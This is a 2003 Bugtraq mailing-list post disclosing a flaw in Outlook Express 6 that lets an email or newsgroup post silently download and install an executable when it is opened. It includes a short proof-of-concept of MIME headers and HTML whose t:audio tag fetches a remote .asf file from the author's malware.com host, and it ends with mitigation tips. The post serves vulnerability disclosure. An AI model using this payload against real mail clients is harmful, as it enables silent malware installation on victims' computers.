Home page logo

bugtraq logo Bugtraq mailing list archives

Restricted Zone: the OUTLOOK EXPRESS
From: "http-equiv () excite com" <1 () malware com>
Date: Wed, 21 May 2003 11:55:34 -0000

Tuesday, 20 May, 2003

Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 

This can be achieved with the default setting of Outlook Express: 

Technically the following never worked, cannot work, shouldn't work. 
But it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com 

<html xmlns:t>
<t:audio  t:src="http://www.malware.com/freek.asf";  />

What that does is invoke our freakish media file including our trusty 
and battle-hardened 0s URL flip from within the html of an email or 
newsgroup post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail, 
modified third-party files [whatever that means] function according 
to plan. Specifically audio + *.asf. Our 0s URL flip points to our 
file on the remote server and automatically forces our download as 
instructed. Couple that with the most recent flood-like functionality 
of the iframe: http://www.securityfocus.com/archive/1/321662 and 
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP and [WMP 9 fails]

First Step Working Example:



1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora 
WebBrowser Control Embedded Media Player File Vulnerability ': 
http://www.securityfocus.com/bid/4343 which appears to never have 
been patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from 
untrustworthy sources

End Call


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]